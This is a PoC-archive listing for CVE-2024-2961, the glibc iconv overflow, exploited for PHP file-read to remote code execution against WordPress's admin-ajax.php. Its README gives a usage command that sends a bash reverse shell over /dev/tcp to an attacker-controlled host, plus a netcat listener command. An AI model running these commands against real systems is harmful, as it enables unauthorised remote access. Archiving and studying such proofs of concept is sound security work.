Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-2961 PoC — GNU C Library 安全漏洞

Source
https://github.com/regantemudo/PHP-file-read-to-RCE-CVE-2024-2961-
Associated Vulnerability
Title:GNU C Library 安全漏洞 (CVE-2024-2961)
Description:The iconv() function in the GNU C Library versions 2.39 and older may overflow the output buffer passed to it by up to 4 bytes when converting strings to the ISO-2022-CN-EXT character set, which may be used to crash an application or overwrite a neighbouring variable.
Description
To use, implement the Remote class, which tells the exploit how to send the payload.
Readme
# PHP file-read to RCE (CVE-2024-2961)

## TODO Parse LIBC to know if patched
## INFORMATIONS
#### To use, implement the Remote class, which tells the exploit how to send the payload.

This exploit script targets the `admin-ajax.php` endpoint on WordPress to achieve remote code execution.

## Usage

```bash
python3 cnext-exploit.py 'http://blog.bigbang.com/wp-admin/admin-ajax.php' 'bash -c "bash -i >& /dev/tcp/ip/port 0>&1"'

```

Set up a listener to catch the reverse shell:

```bash
nc -lvnp port
```
File Snapshot

 [4.0K]  /data/pocs/c51bd98896c862d676cd5a9afa8f3fa374eda424
├── [ 48K]  exploit.py
└── [ 508]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →